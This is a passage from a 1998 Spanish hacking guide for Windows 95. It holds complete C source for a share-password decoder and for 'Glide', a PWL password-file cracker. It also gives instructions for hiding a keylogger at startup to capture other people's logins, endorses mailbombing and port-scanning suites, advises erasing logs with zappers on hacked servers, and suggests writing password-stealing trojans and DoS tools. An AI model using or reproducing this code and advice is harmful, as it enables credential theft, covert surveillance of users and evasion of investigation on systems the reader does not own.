  1521.   int cletter = 1;
  1522.   int blockl1 = 1;
  1523.   int blockl2 = 1;
  1524.   int retval = 1;
  1525.   unsigned char code = 0x73;    /* The code for a space */
  1526.   while((i<256) && (code != *mychar)) {
  1527.     switch (cletter) {
  1528.     case 1:
  1529.       code--;
  1530.       cletter++;
  1531.       break;
  1532.     case 2:
  1533.       code--;
  1534.       cletter++;
  1535.       break;
  1536.     case 3:
  1537.       code--;
  1538.       cletter++;
  1539.       break;
  1540.     case 4:
  1541.       code += 7;
  1542.       cletter++;
  1543.       break;
  1544.     case 5:
  1545.       code--;
  1546.       cletter++;
  1547.       break;
  1548.     case 6:
  1549.       code--;
  1550.       cletter++;
  1551.       break;
  1552.     case 7:
  1553.       code--;
  1554.       cletter++;
  1555.       break;
  1556.     case 8:
  1557.       cletter = 1;
  1558.       switch (blockl1) {
  1559.       case 1:
  1560.         code += 7;
  1561.     blockl1++;
  1562.     break;
  1563.       case 2:
  1564.         code -= 25;
  1565.         blockl1++;
  1566.         break;
  1567.       case 3:
  1568.         code += 7;
  1569.     blockl1++;
  1570.         break;
  1571.       case 4:
  1572.     blockl1 = 1;
  1573.     switch (blockl2) {
  1574.     case 1:
  1575.           code = 0x13;
  1576.           blockl2++;
  1577.       break;
  1578.     case 2:
  1579.           code = 0x33;
  1580.           blockl2++;
  1581.           break;
  1582.     case 3:
  1583.           code = 0x23;
  1584.           blockl2++;
  1585.       break;
  1586.     case 4:
  1587.       code = 0x73;
  1588.           blockl2 = 1;
  1589.           break;
  1590.     }
  1591.     break;
  1592.       }
  1593.       break;
  1594.     }
  1595.     i++;
  1596.   }
  1597.   if (i == 256) retval = 0;
  1598.   else *mychar = i + 32;
  1599.   return retval;
  1600. }    /* End of DecodeCharFive() */
  1601.  
  1602. int DecodeCharSix(unsigned char *mychar) {
  1603.   int i = 0;
  1604.   int cletter = 1;
  1605.   int blockl1 = 1;
  1606.   int blockl2 = 1;
  1607.   int retval = 1;
  1608.   unsigned char code = 0x89;    /* The code for a space */
  1609.   while((i<256) && (code != *mychar)) {
  1610.     switch (cletter) {
  1611.     case 1:
  1612.       code--;
  1613.       cletter++;
  1614.       break;
  1615.     case 2:
  1616.       code += 3;
  1617.       cletter++;
  1618.       break;
  1619.     case 3:
  1620.       code--;
  1621.       cletter++;
  1622.       break;
  1623.     case 4:
  1624.       code += 3;
  1625.       cletter++;
  1626.       break;
  1627.     case 5:
  1628.       code--;
  1629.       cletter++;
  1630.       break;
  1631.     case 6:
  1632.       code += 3;
  1633.       cletter++;
  1634.       break;
  1635.     case 7:
  1636.       code--;
  1637.       cletter++;
  1638.       break;
  1639.     case 8:
  1640.       cletter = 1;
  1641.       switch (blockl1) {
  1642.       case 1:
  1643.         code -= 13;
  1644.     blockl1++;
  1645.     break;
  1646.       case 2:
  1647.     code += 19;
  1648.         blockl1++;
  1649.     break;
  1650.       case 3:
  1651.         code -= 13;
  1652.     blockl1++;
  1653.     break;
  1654.       case 4:
  1655.     blockl1 = 1;
  1656.     switch (blockl2) {
  1657.     case 1:
  1658.           code = 0xe9;
  1659.       blockl2++;
  1660.       break;
  1661.     case 2:
  1662.           code = 0xc9;
  1663.       blockl2++;
  1664.       break;
  1665.     case 3:
  1666.           code = 0x29;
  1667.       blockl2++;
  1668.       break;
  1669.     case 4:
  1670.       code = 0x89;
  1671.           blockl2 = 1;
  1672.           break;
  1673.     }
  1674.     break;
  1675.       }
  1676.       break;
  1677.     }
  1678.     i++;
  1679.   }
  1680.   if (i == 256) retval = 0;
  1681.   else *mychar = i + 32;
  1682.   return retval;
  1683. }     /* End of DecodeCharSix() */
  1684.  
  1685. int DecodeCharSeven(unsigned char *mychar) {
  1686.   int i = 0;
  1687.   int cletter = 1;
  1688.   int blockl1 = 1;
  1689.   int blockl2 = 1;
  1690.   int retval = 1;
  1691.   unsigned char code = 0xf4;    /* The code for a space */
  1692.   while((i<256) && (code != *mychar)) {
  1693.     switch (cletter) {
  1694.     case 1:
  1695.       code++;
  1696.       cletter++;
  1697.       break;
  1698.     case 2:
  1699.       code++;
  1700.       cletter++;
  1701.       break;
  1702.     case 3:
  1703.       code++;
  1704.       cletter++;
  1705.       break;
  1706.     case 4:
  1707.       code -= 7;
  1708.       cletter++;
  1709.       break;
  1710.     case 5:
  1711.       code++;
  1712.       cletter++;
  1713.       break;
  1714.     case 6:
  1715.       code++;
  1716.       cletter++;
  1717.       break;
  1718.     case 7:
  1719.       code++;
  1720.       cletter++;
  1721.       break;
  1722.     case 8:
  1723.       cletter = 1;
  1724.       switch (blockl1) {
  1725.       case 1:
  1726.         code += 9;
  1727.     blockl1++;
  1728.     break;
  1729.       case 2:
  1730.     code -= 23;
  1731.         blockl1++;
  1732.     break;
  1733.       case 3:
  1734.         code += 9;
  1735.     blockl1++;
  1736.     break;
  1737.       case 4:
  1738.     blockl1 = 1;
  1739.     switch (blockl2) {
  1740.     case 1:
  1741.           code = 0x94;
  1742.       blockl2++;
  1743.       break;
  1744.     case 2:
  1745.           code = 0xb4;
  1746.       blockl2++;
  1747.       break;
  1748.     case 3:
  1749.           code = 0x54;
  1750.       blockl2++;
  1751.       break;
  1752.     case 4:
  1753.       code = 0xf4;
  1754.           blockl2 = 1;
  1755.           break;
  1756.     }
  1757.     break;
  1758.       }
  1759.       break;
  1760.     }
  1761.     i++;
  1762.   }
  1763.   if (i == 256) retval = 0;
  1764.   else *mychar = i + 32;
  1765.   return retval;
  1766. }   /* End of DecodeCharSeven() */
  1767.  
  1768. int DecodeCharEight(unsigned char *mychar) {
  1769.   int i = 0;
  1770.   int cletter = 1;
  1771.   int blockl1 = 1;
  1772.   int blockl2 = 1;
  1773.   int retval = 1;
  1774.   unsigned char code = 0x4a;    /* The code for a space */
  1775.   while((i<256) && (code != *mychar)) {
  1776.      switch (cletter) {
  1777.      case 1:
  1778.        code++;
  1779.        cletter++;
  1780.        break;
  1781.      case 2:
  1782.        code -= 3;
  1783.        cletter++;
  1784.        break;
  1785.      case 3:
  1786.        code++;
  1787.        cletter++;
  1788.        break;
  1789.      case 4:
  1790.        code += 5;
  1791.        cletter++;
  1792.        break;
  1793.      case 5:
  1794.        code++;
  1795.        cletter++;
  1796.        break;
  1797.      case 6:
  1798.        code -= 3;
  1799.        cletter++;
  1800.        break;
  1801.      case 7:
  1802.        code++;
  1803.        cletter++;
  1804.        break;
  1805.      case 8:
  1806.        cletter = 1;
  1807.        switch (blockl1) {
  1808.        case 1:
  1809.      code -= 11;
  1810.      blockl1++;
  1811.      break;
  1812.        case 2:
  1813.      code += 21;
  1814.      blockl1++;
  1815.      break;
  1816.        case 3:
  1817.      code -= 11;
  1818.      blockl1++;
  1819.      break;
  1820.        case 4:
  1821.      blockl1 = 1;
  1822.      switch (blockl2) {
  1823.      case 1:
  1824.        code = 0x2a;
  1825.        blockl2++;
  1826.        break;
  1827.      case 2:
  1828.        code = 0x0a;
  1829.        blockl2++;
  1830.        break;
  1831.      case 3:
  1832.        code = 0xea;
  1833.        blockl2++;
  1834.        break;
  1835.      case 4:
  1836.        code = 0x4a;
  1837.        blockl2 = 1;
  1838.        break;
  1839.      }
  1840.      break;
  1841.        }
  1842.        break;
  1843.      }
  1844.      i++;
  1845.   }
  1846.   if (i == 256) retval = 0;
  1847.   else *mychar = i + 32;
  1848.   return retval;
  1849. }    /* End of DecodeCharEight() */
  1850.  
  1851. /* End of program */
  1852.  
  1853.    Cuando ejecutemos el programa nos saldra esto:
  1854.  
  1855.    c:\>sharepw
  1856.    Input the byte code in hex (ex: 76 d5 09 e3):
  1857.  
  1858.    Nos pide que introduzcamos el password en formato Hexadecimal. Hay muchas
  1859.    tablas por Internet para aquellos que no tengan una.
  1860.  
  1861.    5g. Snadboy's revelation v1.1.
  1862.  
  1863.   En este apartado hablare sobre una interesante herramienta. El Snadboy es
  1864.   una tool que nos descripta los astericos de la tipica ventana que pide
  1865.   password. Si hay una ventana con un password y que no entendemos porque
  1866.   solo salen asteriscos, lo que tenemos que hacer es abrir el Snadboy y
  1867.   situarnos al lado de la ventana de password, la ventana del Snadboy tiene
  1868.   una "mira de punto", pinchamos encima de la mira y la arrastramos con el
  1869.   raton sobre la ventana del password situandonos encima del password,
  1870.   soltamos y en la ventana del Snadboy veremos el password descifrado.
  1871.  
  1872.   Como nota, este programa para lo que hace, ocupa mucho en el disco duro,por
  1873.   lo que puede ser un poco sospechoso o que los coders no lo han optimizado
  1874.   demasiado que digamos.
  1875.  
  1876.    5h. Keylog95.
  1877.  
  1878.   Este programa nos sera muy util en sitio donde halla mucha gente, ya que
  1879.   es un Key recoder, o sea, una pequeña utilidad que se queda residente
  1880.   en memoria y graba todos los logins y password que la gente vaya metiendo.
  1881.  
  1882.   El programa es de sencillo manejo, pero tiene que haver unos pequeños
  1883.   requisitos, primero tener las librerias VBRUN300.DLL y QPRO200.DLL en el
  1884.   directorio c:\windows\system y ademas tener un directorio llamado c:\win,
  1885.   ya que es alli donde el programa grabara la informacion que obtenga, en
  1886.   un fichero llamado "logx", por lo que esto quedara:
  1887.  
  1888.   c:\win\logx
  1889.  
  1890.   Cuando las librerias esten metidas en el directorio System, windows creara
  1891.   un icono en la carpeta de Inico, por lo que es conveniente darle un
  1892.   atributo de Minimizado para que nadie lo pueda ver y asi siempre que se
  1893.   arranque Windows tambien lo hara el Keylog95 :)
  1894.  
  1895.    5i. Glide.
  1896.  
  1897.   El Glide es otro programa que sirve para desencriptar un password's en
  1898.   Win95. Al igual que el Sharepw solo lo tenemos que compiLar y ejecutar
  1899.   con la salvedad que esta escrito en C++.
  1900.  
  1901. #include <stdio.h>
  1902. #include <string.h>
  1903. #include <process.h>
  1904. #include <stdlib.h>
  1905. #include <ctype.h>
  1906. #include <conio.h>
  1907.  
  1908. unsigned char huge Data[100001];
  1909. unsigned char keystream[1001];
  1910. int Rpoint[300];
  1911.  
  1912. void main (int argc,char *argv[]) {
  1913.     FILE *fd;
  1914.     int     i,j,k;
  1915.     int    size;
  1916.     char ch;
  1917.     char *name;
  1918.     int cracked;
  1919.     int sizemask;
  1920.     int maxr;
  1921.     int rsz;
  1922.     int pos;
  1923.     int Rall[300]; /* recource allocation table */
  1924.  
  1925.  
  1926.     if (argc<2) {
  1927.         printf("usage: glide filename (username)");
  1928.         exit(1);
  1929.     }
  1930.  
  1931.     /* read PWL file */
  1932.  
  1933.     fd=fopen(argv[1],"rb");
  1934.     if(fd==NULL) {
  1935.         printf("can't open file %s",argv[1]);
  1936.         exit(1);
  1937.     }
  1938.     size=0;
  1939.     while(!feof(fd)) {
  1940.         Data[size++]=fgetc(fd);
  1941.     }
  1942.     size--;
  1943.     fclose(fd);
  1944.  
  1945.     /* find username */
  1946.     name=argv[1];
  1947.     if(argc>2) name=argv[2];
  1948.     printf("Username: %s\n",name);
  1949.  
  1950.     /* copy encrypted text into keystream */
  1951.     cracked=size-0x0208;
  1952.     if(cracked<0) cracked=0;
  1953.     if(cracked>1000) cracked=1000;
  1954.     memcpy(keystream,Data+0x208,cracked );
  1955.  
  1956.     /* generate 20 bytes of keystream */
  1957.     for(i=0;i<20;i++) {
  1958.         ch=toupper(name[i]);
  1959.         if(ch==0) break;
  1960.         if(ch=='.') break;
  1961.         keystream[i]^=ch;
  1962.     };
  1963.     cracked=20;
  1964.  
  1965.  
  1966.     /* find allocated recources */
  1967.  
  1968.     sizemask=keystream[0]+(keystream[1]<<8);
  1969.     printf("Sizemask: %04X\n",sizemask);
  1970.  
  1971.     for(i=0;i<256;i++) Rall[i]=0;
  1972.  
  1973.     maxr=0;
  1974.     for(i=0x108;i<0x208;i++) {
  1975.         if(Data[i]!=0xff) {
  1976.             Rall[Data[i]]++;
  1977.             if (Data[i]>maxr) maxr=Data[i];
  1978.         }
  1979.     }
  1980.         maxr=(((maxr/16)+1)*16);      /* recource pointer table size appears
  1981.                                          to be divisable by 16 */
  1982.  
  1983.     /* search after recources */
  1984.  
  1985.     Rpoint[0]=0x0208+2*maxr+20+2;    /* first recource */
  1986.     for(i=0;i<maxr;i++) {
  1987.         /* find size of current recource */
  1988.         pos=Rpoint[i];
  1989.         rsz=Data[pos]+(Data[pos+1]<<8);
  1990.         rsz^=sizemask;
  1991.         printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i
  1992.                 ,Rall[i]);
  1993.         if( (Rall[i]==0) && (rsz!=0) ) {
  1994.             printf("unused resource has nonzero size !!!\n");
  1995.             printf("If last line produced any : You
  1996.                         may try to recover\n");
  1997.             printf("press y to attempt recovery\n");
  1998.             ch=getch();
  1999.             if(ch!='y') exit(0);
  2000.             rsz=2;
  2001.             i-=1;
  2002.         }
  2003.  
  2004.         pos+=rsz;
  2005.  
  2006.         /* Resources have a tendency to have the wrong size for
  2007.                 some reason */
  2008.         /* check for correct size */
  2009.  
  2010.         if(i<maxr-1) {
  2011.             while(Data[pos+3]!=keystream[1]) {
  2012.                 printf(":",Data[pos+3]);
  2013.                 pos+=2; /* very rude may fail */
  2014.             }
  2015.         }
  2016.  
  2017.         pos+=2;    /* include pointer in size */
  2018.         Rpoint[i+1]=pos;
  2019.     }
  2020.     Rpoint[maxr]=size;
  2021.  
  2022.     /* insert Table data into keystream */
  2023.     for(i=0;i <= maxr;i++) {
  2024.         keystream[20+2*i]^=Rpoint[i] & 0x00ff;
  2025.         keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
  2026.     }
  2027.     cracked+=maxr*2+2;
  2028.  
  2029.     printf("%d bytes of keystream recovered\n",cracked);
  2030.  
  2031.     /* decrypt resources */
  2032.     for(i=0;i < maxr;i++) {
  2033.                rsz=Rpoint[i+1]-Rpoint[i];
  2034.                if (rsz>cracked) rsz=cracked;
  2035.                printf("Recource[%d] (%d)\n",i,rsz);
  2036.                for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
  2037.                printf("\n");
  2038.     }
  2039.     exit(0);
  2040. }
  2041.    Cuando lo ejecutemos nos saldra lo siguiente:
  2042.  
  2043.    c:\>glide
  2044.    usage: glide filename (username)
  2045.  
  2046.    Pidiendo el fichero y el login.
  2047.  
  2048.    5j. Win95 anonymail v 1.0.
  2049.  
  2050.   Este sencillo programa nos sera de gran ayuda para enviar mail anonimo.
  2051.   Cuando ejecutemos el programa nos saldra una ventana con los siguientes
  2052.   campos:
  2053.  
  2054.   Host
  2055.  
  2056.   From
  2057.  
  2058.   To
  2059.  
  2060.   Subject
  2061.  
  2062.   Solo tenemos que rellenarlos correctamente y pulsar el "send" para enviar
  2063.   el mail anonimo y cuando hayamos acabado pulsar "quit".
  2064.  
  2065.   Un programa muy sencillo que nos puede ser util. Como nota, el autor nos
  2066.   advierte que nadie le envie mail anonimo con su programa, por lo que se
  2067.   puede deducir que es un farol o que el programa no es tan anonimo, por
  2068.   lo que el autor le habra metido un troyano.
  2069.  
  2070.    5k. Hacker's Utility, V 1.02.
  2071.  
  2072.   Este magnifico programa es una suite para Hackers. Para que nos entendamos,
  2073.   este programa esta compuesto por muchos otros programas y asi dispones
  2074.   de un paquete perfecto para un Hacker.
  2075.  
  2076.   Cuando ejecutamos este programa nos aparecera una ventana con un menu
  2077.   arriba, y cuando abramos una de estas opciones se abrira otra ventana
  2078.   con mas opciones. Ahora podemos ver el menu principal compuesto por
  2079.   los submenus:
  2080.  
  2081.    File -> HU setup, exit
  2082.  
  2083.    Cracking -> crack passwords -> crack zip passwords
  2084.                                   crack passwd files
  2085.                                   passwd jackpot
  2086.                words prcessing -> words wizard
  2087.                                   xtrakt words
  2088.                                   sort
  2089.  
  2090.    Tools -> create & fill a dummy fill, compare binary files
  2091.  
  2092.    Network -> finger, port scanner, ip <> name converter
  2093.  
  2094.    Other Stuff -> hackers's test, serial numbers, extracting/ripping sound
  2095.                   files, extracting/ripping graphic files, manual extract/
  2096.                   rip files
  2097.  
  2098.    System -> dos prompt, run custom application, shut down
  2099.  
  2100.    Window -> cascade, tile horizontal, tile vertical, arrange icons,
  2101.              main toolbar, main status bar
  2102.  
  2103.    Help -> tip of day, index, using help, about Hacker's Utility
  2104.    
  2105.   La verdad es que esta suite esta muy completa y nos sera de gran ayuda. Por
  2106.   ejemplo el sistema se puede configurar en File->HU setup para que sea mas
  2107.   personal. Cabe destacar ciertas utilidades como los crackeadores que tiene
  2108.   incorporados para crackear el passwd de un Unix o romper el password de
  2109.   un fichero zip. Luego en la seccion de Network, las utilidades nos seran
  2110.   de mucha ayuda, como el Finger, el scaneador de puertos y el convertidor
  2111.   de direcciones IP. Esto en mi opion seria lo mejor del programa pero
  2112.   luego trae otras cosas que tambien nos pueden servir para al menos
  2113.   divertinos un rato, esto es el caso del Hacker's Test, por ejemplo podemos
  2114.   activar el Port Scanner y mientras esperamos a los resultados podemos
  2115.   hacer un test para saber si somos buenos Hackers.
  2116.  
  2117.   La verdad es que es una magnifica herramienta que los Hackers de win deben
  2118.   tener.
  2119.  
  2120.    5l. Haktek v1.1.
  2121.  
  2122.   AL igual que el HU, Haktek, es una suite que tambien nos sera de gran
  2123.   ayuda. Pero esta suite esta mas enfocada a atacar por Internet, logicamente
  2124.   con el peligro que ello conlleva.
  2125.  
  2126.   Al ejecutar el programa, se abrira una ventana en la que veremos una serie
  2127.   de iconos en la parte izquierda de la ventana y una pantalla de texto que
  2128.   nos explica cada icono. Empezando de arriba para abajo:
  2129.  
  2130.   Diskette-> graba la sesion (lo que esta en pantalla y lo que hallamos hecho
  2131.              con el programa).
  2132.  
  2133.   X -> prepara la sesion, borrando la pantalla de texto.
  2134.  
  2135.   ? -> nos habla sobre sus autores.
  2136.  
  2137.   Circulo -> señalos un objetivo, por defecto www.microsoft.com.
  2138.  
  2139.   Antena -> Utilidad ping.
  2140.  
  2141.   Gafas -> scaneador de puertos.
  2142.  
  2143.   Bomba -> bombardeador de correo.
  2144.  
  2145.   Stop bomb -> para protegernos de un mailbomber.
  2146.  
  2147.   Radio -> scaneador de IP'S.
  2148.  
  2149.   Prismaticos -> para enviar finger nulos.
  2150.  
  2151.   La verdad es que es una suite muy completa y nos ayudara a joder a todo
  2152.   el que se ponga por delante. Con un poco de practica dominaremos este
  2153.   programa a la perfeccion.
  2154.  
  2155.    5m. Claymore Brute Force.
  2156.  
  2157.   Esta utlidad no sera de gran ayuda para desemcriptar passowrd's de un
  2158.   fichero passwd de Unix. Cuando lo ejecutemos se abrira una ventana con
  2159.   varias opciones, de facil manejo, para aquellos que quieren algo simple y
  2160.   corriendo sobre win95. Este crackeador es de fuerza bruta pudiendo ser
  2161.   algo lento.
  2162.  
  2163.   6. Medidas De Seguridad.
  2164.  
  2165.   En esta seccion hablare sobre varios aspectos muy importanes, logicamente
  2166.   la seguridad personal, de nuestro ordenador, etc... Para que nadie pueda
  2167.   jodernos aunque nos movamos por Win95.
  2168.  
  2169.    6a. Protegiendo Nuestro Ordenador.
  2170.  
  2171.   Nuestro ordenador corriendo con Win95, sera propenso a muchos tipos de
  2172.   ataques diferentes. Por ello conviene estar preparado y sobre estar
  2173.   alerta sobre las nuevas cosas que surgen por el mundo Underground, el mejor
  2174.   medio son los e-zines y por supuesto buenos amigos por el IRC.
  2175.  
  2176.     6a1. Ataques Tipicos a Nuestro Windows.
  2177.  
  2178.   Logicamente seremos muy propensos a ataques tipo DoS (denial of service),
  2179.   como son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB,
  2180.   etc ...
  2181.  
  2182.   Para estar protegidos lo que tenemos que hacer es pasarnos por los
  2183.   web's de seguridad o el de la casa Microsoft en los cuales se cuelgan
  2184.   los parches de estos ataques. No siempre funcioran pero nos ahorraran
  2185.   muchos disgustos en muchos casos. La gente suele ser muy propensa a estas
  2186.   cosas porque no esta informada sobre estos ataques y por consiguinte
  2187.   ademas no se instala los parches correspondientes.
  2188.  
  2189.     6a2. Encriptacion de Nuestra Informacion.
  2190.  
  2191.   La informacion sensible que tengamos en nuestro disco duro conviene que
  2192.   este encriptada con algun buen programa de encriptacion del tipo PGP, el
  2193.   cual no puede ser roto en estos tiempos.
  2194.  
  2195.   Tambien podemos hacer uso de la Stereografia, el arte de ocultar la
  2196.   informacion. Hay varios programas en Internet que nos permiten esconder
  2197.   ficheros de txt en ficheros graficos o de sonido, por supuesto habra
  2198.   que tener cuidado cuando hacemos estas operaciones, debido a la diferencia
  2199.   de formatos entre los ficheros.
  2200.  
  2201.   Incluso podemos encriptar todo o parte del disco duro para mayor seguridad
  2202.   en nuestros datos.
  2203.  
  2204.     6a3. Eliminar Informacion De Forma Segura.
  2205.  
  2206.   Cuando borramos un fichero del disco duro, realmente no esta borrado, por
  2207.   lo que puede ser rescatado mediante herramientas especiales. Esto no
  2208.   es conveniente si por el caso nuestro ordenador cae en malos manos y nos
  2209.   ha dado tiempo a borrar algunos ficheros, no serviria de nada ya que
  2210.   podrian recuperar la informacion.
  2211.  
  2212.   Para borrar ficheros que contegan informacion muy privada o no queremos
  2213.   que nadie la pueda obtener, conviene borrar este fichero mediante algun
  2214.   programa especial para el borrado de ficheros. Existen por Internet
  2215.   programas muy buenos para ello o tambien podemos leernos un fichero
  2216.   sobre este tema, de recomendable lectura:
  2217.  
  2218.         Secure Deletion of Data from Magnetic and Solid-State Memory
  2219.                                                       
  2220.                                Peter Gutmann
  2221.                        Department of Computer Science
  2222.                            University of Auckland
  2223.                          pgut001@cs.auckland.ac.nz
  2224.  
  2225.  
  2226.     6a4. Eliminacion De Virus.
  2227.  
  2228.   Los virus son una de las peores pesadillas, pero en realidad no entiendo
  2229.   porque, ya que son solo programas. Y no son dificiles de controlar. Solo
  2230.   conviene tener un buen antivirus o varios, si, tambien los hay por internet
  2231.   a patadas y gratis.
  2232.  
  2233.   Incluso muchos virus se pueden anular mediante un par de comandos del
  2234.   MS-DOS, es simplemente conocer un poco los virus, logicamente se sale de
  2235.   la tematica de esta guia. Pero la realidad es que no hay que tener miedo
  2236.   de los virus. Si nuestro ordenador esta infectado, lo primero que tenemos
  2237.   que hacer es calmarnos, luego hacer una copia de seguridad de nuestro
  2238.   disco duro (da igual si esta infectado), por si el virus, en el peor de
  2239.   los casos borra el disco duro y ahora buscar una vacuna disponible.
  2240.  
  2241.   Si fuese el caso que nuestro antivirus no quita el virus, pues simplemente
  2242.   hacemos una copia y lo enviamos a alguna empresa sobre seguridad informatica
  2243.   ya que seguro que nos sacan un antivirus.
  2244.  
  2245.    6b. Protegiendo Nuestras Acciones.
  2246.  
  2247.   Esta seccion esta enfocada a esconder nuestros actos hacking por Internet.
  2248.   Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente no
  2249.   se entera de esto y deja muchas pistas.
  2250.  
  2251.     6b1. Borrando Nuestras Huellas.
  2252.  
  2253.   Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos
  2254.   conectado, como, desde donde y varias cosas mas), por eso hay que tener
  2255.   mucho cuidado.
  2256.  
  2257.   La mayoria de servidores que hackeemos por Internet seran unix, conviene
  2258.   tener a mano "zappers", son programas que borran nuestras huellas en el
  2259.   servidor. Existen muchos programas para este proposito que funcionan bajo
  2260.   Unix. Solo los tenemos que compilar en el servidor y ejecutarlos. Por
  2261.   desgracia al usar Win95 no podemos compilarlos en nuestro ordenador y
  2262.   subirlo por FTP pero algo es algo.
  2263.  
  2264.   Tambien tenemos que procurar esconder nuestra IP, hay muchos metodos
  2265.   para ello, la mas facil es usar nodos (servidores intermedios y asi
  2266.   dificultar nuestro rastreo).
  2267.  
  2268.     6b2. Encriptando Nuestro Correo.
  2269.  
  2270.   Conviene encriptar nuestro correo, sobre todo si esta relacionado con el
  2271.   hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre
  2272.   podemos alegar "Privacidad en los Datos" :). Al igual que antes hay varios
  2273.   paquetes de PGP para mail.
  2274.  
  2275.   Incluso es recomendable el uso de cuentas anomimas de correo, aunque de
  2276.   esto la gente esta mas concenciada.
  2277.  
  2278.   7. Sugerencias Para Un Mejor Hacking.
  2279.  
  2280.   Aqui hablare sobre algunas ideas que pueden potenciar el hacking en
  2281.   Win95 y la creacion de nuevas herramientas. 
  2282.  
  2283.    - Programas troyanos que capturen el password del acceso a Internet.
  2284.  
  2285.    - Programas para IP-Spoof.
  2286.  
  2287.    - Creacion de herramientas de redes para Win95.
  2288.  
  2289.    - Wardialers.
  2290.  
  2291.    - Programas para atacar otros Win95 (DoS).
  2292.  
  2293.    - Nuevas Suites.
  2294.  
  2295.    - Programas crackeadores del passwd.
  2296.  
  2297.    - Programas criptograficos.
  2298.  
  2299.    - Programas eliminadores.
  2300.  
  2301.   8. Obtener Informacion.
  2302.  
  2303.   Todo el mundo esta harto de ver cientos de web's donde no hay nada o
  2304.   todo esta repetido. Pues ahora os pondre unas pautas que seguir para
  2305.   obtener la mayor fuente posible de informacion.
  2306.  
  2307.     - Web's sobre hack (que decir).
  2308.  
  2309.     - Web's sobre seguridad Informatica (aqui siempre podemos encontrar
  2310.       muchas cosas, que nos podran servir).
  2311.  
  2312.     - Los RFC (Informacion tecnica sobre Internet, protocolos, seguridad,
  2313.       etc...).
  2314.  
  2315.     - Libros de colores (Documentacion tecnica sobre seguridad en muchos
  2316.       aspectos).
  2317.  
  2318.     - News (estar en un grupo de news y asi recibir noticias de lo que pasa).
  2319.  
  2320.     - Mailing lists (aqui estaremos permanentemente informados).
  2321.  
  2322.     - IRC (podremos hablar con otros hackers y cambiar opiniones).
  2323.  
  2324.   9. Despedida.
  2325.  
  2326.   Pues aqui se acaba esta guia sobre hacking en Win95. Espero que os halla
  2327.   gustado y os sea util, por todo el esfuerzo que ha llevado esta guia.
  2328.  
  2329.   Por desgracia me he dejado muchas cosas en el tintero, que me hubiese
  2330.   gustado explicar pero quien sabe a lo mejor aperece una nueva entrega
  2331.   nunca se sabe :)
  2332.  
  2333.   Me gustaria descatar que a lo mejor con los ultimos puntos de la guia, te
  2334.   has quedado sorprendido respecto a su titulo y despues al ver su contenido,
  2335.   esto se debe a que he preferido dar pautas a seguir y no empezar a explicar
  2336.   cosas que ya muchos sabran o que es informacion realmente facil de
  2337.   encontrar por Internet, ademas si empiezo a explicar algunos de esos
  2338.   titulos me saldria del proposito de esta guia, que es el hacking en Win95 y
  2339.   NO de otros sistemas operativos los cuales disponen de miles de guias
  2340.   sobre hacking.
  2341.  
  2342.   Bueno ya solo me queda despedirme y tened cuidado con lo que haces por
  2343.   Internet, ya que un hacker no se dedica a destruir sistemas informaticos.
  2344.   Y agradecer a todos los que hallan escrito sus conocimientos sobre hack
  2345.   en win95 para la creacion de esta guia!!!.
  2346.  
  2347.    9a. Agradecimientos.
  2348.  
  2349.   Y desde aqui saludar a todos aquellos que de alguna forma han
  2350.   participado en la creacion de esta guia.
  2351.  
  2352.   - Muerte: Por su articulo de recursos compartidos.
  2353.   - Pipero: Por su articulo de recursos compartidos.
  2354.  
  2355.   <><><><><><><><><><><><><><><><><><><><><><><><><>
  2356.  
  2357.   Y desde aqui saludar a toda la peña de #hackers, #hack & #rejoin!!!!!!
  2358.  
  2359.   Grupos como - J.J.F. / HACKERS TEAM -, CYBERHACK, WAKANDA, UNDERHACK,
  2360.   @pOkalypSYS y por supuesto todos los demas !!
  2361.  
  2362.   Y por supuesto: Bisho, Meroka, Folixia, Fragel, Ipgh0st, Metalslug, Dillet,
  2363.   Riddle, Hadden, Guybrush, Tdp, Virux, Cy, Angelipas, S_guy, Xus, Unix-hell,
  2364.   Piotr, Muerte, Koji, Riddle, Case Zero, Nadia, Amanada, Janex, L.A. y todos
  2365.   los que me dejo :)
  2366.  
  2367.                                                             NOBODY (c) 1998.
  2368.